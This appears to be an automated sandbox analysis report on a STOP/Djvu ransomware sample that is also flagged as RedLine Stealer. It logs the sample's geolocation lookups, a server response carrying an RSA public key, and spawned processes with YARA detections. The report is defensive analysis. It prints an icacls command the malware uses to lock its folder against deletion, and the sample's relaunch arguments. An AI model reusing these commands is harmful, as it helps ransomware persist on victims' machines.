              Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 39 54 4c 48 66 75 77 67 4c 31 45 74 47 4e 77 5c 2f 77 35 65 56 5c 5c 6e 57 44 35 62 56 58 37 49 34 63 4f 55 53 78 79 47 37 59 70 62 41 6c 47 36 6b 4f 70 64 42 69 4e 6e 5a 4e 61 77 33 6f 30 75 37 77 54 79 4f 46 68 4c 31 6e 75 61 70 63 38 73 6c 57 6e 38 32 6c 48 6e 5c 5c 6e 62 76 78 4d 5a 75 6a 55 49 41 78 75 6a 57 48 7a 32 67 55 62 70 74 78 33 46 4c 70 4e 75 74 41 62 79 65 74 74 5c 2f 30 4c 36 78 7a 45 4d 58 46 6d 67 31 32 36 76 59 4d 2b 5c 2f 76 65 73 59 31 53 53 42 5c 5c 6e 50 78 45 73 4e 47 35 4c 6d 48 54 33 67 72 57 42 65 59 58 5c 2f 67 59 6f 75 47 62 7a 38 4f 6f 4c 54 6a 32 48 59 66 55 32 64 51 33 35 5a 30 44 36 6b 49 43 77 46 67 68 49 55 44 61 69 48 6c 42 2b 31 5c 5c 6e 71 51 35 71 5c 2f 46 5a 64 51 6c 7a [TRUNCATED]
              Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}
              Sep 2, 2024 18:21:13.758354902 CEST764INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:18 GMT
              Server: Apache/2.4.37 (Win64) PHP/5.6.40
              X-Powered-By: PHP/5.6.40
              Content-Length: 560
              Connection: close
              Content-Type: text/html; charset=UTF-8
              Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 39 54 4c 48 66 75 77 67 4c 31 45 74 47 4e 77 5c 2f 77 35 65 56 5c 5c 6e 57 44 35 62 56 58 37 49 34 63 4f 55 53 78 79 47 37 59 70 62 41 6c 47 36 6b 4f 70 64 42 69 4e 6e 5a 4e 61 77 33 6f 30 75 37 77 54 79 4f 46 68 4c 31 6e 75 61 70 63 38 73 6c 57 6e 38 32 6c 48 6e 5c 5c 6e 62 76 78 4d 5a 75 6a 55 49 41 78 75 6a 57 48 7a 32 67 55 62 70 74 78 33 46 4c 70 4e 75 74 41 62 79 65 74 74 5c 2f 30 4c 36 78 7a 45 4d 58 46 6d 67 31 32 36 76 59 4d 2b 5c 2f 76 65 73 59 31 53 53 42 5c 5c 6e 50 78 45 73 4e 47 35 4c 6d 48 54 33 67 72 57 42 65 59 58 5c 2f 67 59 6f 75 47 62 7a 38 4f 6f 4c 54 6a 32 48 59 66 55 32 64 51 33 35 5a 30 44 36 6b 49 43 77 46 67 68 49 55 44 61 69 48 6c 42 2b 31 5c 5c 6e 71 51 35 71 5c 2f 46 5a 64 51 6c 7a [TRUNCATED]
              Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA9TLHfuwgL1EtGNw\/w5eV\\nWD5bVX7I4cOUSxyG7YpbAlG6kOpdBiNnZNaw3o0u7wTyOFhL1nuapc8slWn82lHn\\nbvxMZujUIAxujWHz2gUbptx3FLpNutAbyett\/0L6xzEMXFmg126vYM+\/vesY1SSB\\nPxEsNG5LmHT3grWBeYX\/gYouGbz8OoLTj2HYfU2dQ35Z0D6kICwFghIUDaiHlB+1\\nqQ5q\/FZdQlzkFIhimqtbS+HbzpJB4dnIF\/TD9iNmFWJwjyAjaJjfdV1npllllYLK\\n3lHt4qRVdUfJBn0puzHB218fzdgcivOuvxzrBR9zm8vj45HmdquPQv5T8abYGYIn\\nXwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT"}


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.749701188.114.97.34436476C:\Users\user\Desktop\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              2024-09-02 16:21:06 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-09-02 16:21:06 UTC897INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:06 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HBp58CbRNL8lgOcddiHedDCKyZAilwEx2Yg%2F%2BxlwatRn1okj2KF9lryr%2FZ9UC09PPggLEwkuRvC1%2BbsIr%2FQSDUeCCh2nbRlLeb0HNQSGdUW9wI%2Bie%2BbqIlH5tiv"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bced4c90dfe43c8-EWR
              alt-svc: h3=":443"; ma=86400
              2024-09-02 16:21:06 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-09-02 16:21:06 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.749702188.114.97.34436544C:\Users\user\Desktop\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              2024-09-02 16:21:08 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-09-02 16:21:08 UTC893INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:08 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdOrxk3%2FLAFhv3t8V8zUC0YUpfvJKmlBOjlZnnhHiJ7ViiQMSNjvHLEtLWHAWM%2Ff0yRSdNyomJs4p%2BbGL%2FdFTn94ru84e6ItLPzlolnCvCc1hjmT2EryZZ%2BBjPZJ"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bced4d59dbb41c3-EWR
              alt-svc: h3=":443"; ma=86400
              2024-09-02 16:21:08 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-09-02 16:21:08 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.749703188.114.97.34431424C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              2024-09-02 16:21:10 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-09-02 16:21:10 UTC895INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:10 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cL%2F1CYVR%2FZt2a%2Fn2LqZBio1gwuZYiQZ2tiwFfagZloZzEa7Cw5DeMNlJ%2BGuOV3%2Fu9KvQ3IGsDmd9wpLuMJlXCVV7gzpJFgHndkrFhp1AcAcksEF7aYtrNvA8LK%2FS"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bced4e37f4480d9-EWR
              alt-svc: h3=":443"; ma=86400
              2024-09-02 16:21:10 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-09-02 16:21:10 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.749712188.114.97.34437900C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              2024-09-02 16:21:20 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-09-02 16:21:20 UTC891INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:20 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j3FlhCcQzAsr8ca3BOx0rW6ESAKe5o2uwlyagUKExtD1xQQyFa0k0zjzo%2BOcs81AS%2Fto7qf75n9Bb1fsTa%2FoXpPAjYcrP%2BCbrNcXYLJ8y3hTuYpSgjgApGosQMyx"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bced5224a90c44a-EWR
              alt-svc: h3=":443"; ma=86400
              2024-09-02 16:21:20 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-09-02 16:21:20 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.749725188.114.97.34438144C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              2024-09-02 16:21:32 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-09-02 16:21:33 UTC887INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:33 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sWRsTmEHCmcZZLus5cZ0E2LWDmSvqzWtRBZaASgoMd1foZi8cW7Qsoj9kWVZVve3r%2BJeIGEMCQNbnNeScwFxfGCWlG6ogx%2BFzqgUvr6GfNOVAT1clt00XhFS6QrN"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bced57048620cba-EWR
              alt-svc: h3=":443"; ma=86400
              2024-09-02 16:21:33 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-09-02 16:21:33 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.749727188.114.97.34436912C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              2024-09-02 16:21:44 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-09-02 16:21:44 UTC885INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:21:44 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lrsEQkKHkEVKpEClMIEZ1dsabluTJEhh6XDU6O2iHQsZmJx9i2B%2BTqpnzzAUXXGQqXvfhJKBxK2olsTVv7BnagqeropA9MDTM87OM3qSebNtTrReCpi4BiRFtZvd"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bced5b98ee00fa3-EWR
              alt-svc: h3=":443"; ma=86400
              2024-09-02 16:21:44 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-09-02 16:21:44 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.749731188.114.97.34437900C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              TimestampBytes transferredDirectionData
              2024-09-02 16:23:06 UTC85OUTGET /geo.json HTTP/1.1
              User-Agent: Microsoft Internet Explorer
              Host: api.2ip.ua
              2024-09-02 16:23:06 UTC885INHTTP/1.1 200 OK
              Date: Mon, 02 Sep 2024 16:23:06 GMT
              Content-Type: application/json
              Transfer-Encoding: chunked
              Connection: close
              strict-transport-security: max-age=63072000; preload
              x-frame-options: SAMEORIGIN
              x-content-type-options: nosniff
              x-xss-protection: 1; mode=block; report=...
              access-control-allow-origin: *
              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6XVChI8RoYu09ds1HZJzpH9PvM7Ex6gztSLbGC1Bj0D1dOoOWfxTzkEKorOC6WLzk2wCpCJJ2o0DGqMyUkqQHld3tcAXnMcqIaL9yuWHKkoUAv3eVrg%2Fv79Fu3te"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8bced7b91d9c43af-EWR
              alt-svc: h3=":443"; ma=86400
              2024-09-02 16:23:06 UTC418INData Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63
              Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
              2024-09-02 16:23:06 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:12:21:03
              Start date:02/09/2024
              Path:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\66d5df681876c_file010924.exe"
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1232942398.00000000022C9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:12:21:03
              Start date:02/09/2024
              Path:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\66d5df681876c_file010924.exe"
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:4
              Start time:12:21:05
              Start date:02/09/2024
              Path:C:\Windows\SysWOW64\icacls.exe
              Wow64 process (32bit):true
              Commandline:icacls "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Imagebase:0x9c0000
              File size:29'696 bytes
              MD5 hash:2E49585E4E08565F52090B144062F97E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:12:21:05
              Start date:02/09/2024
              Path:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTask
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
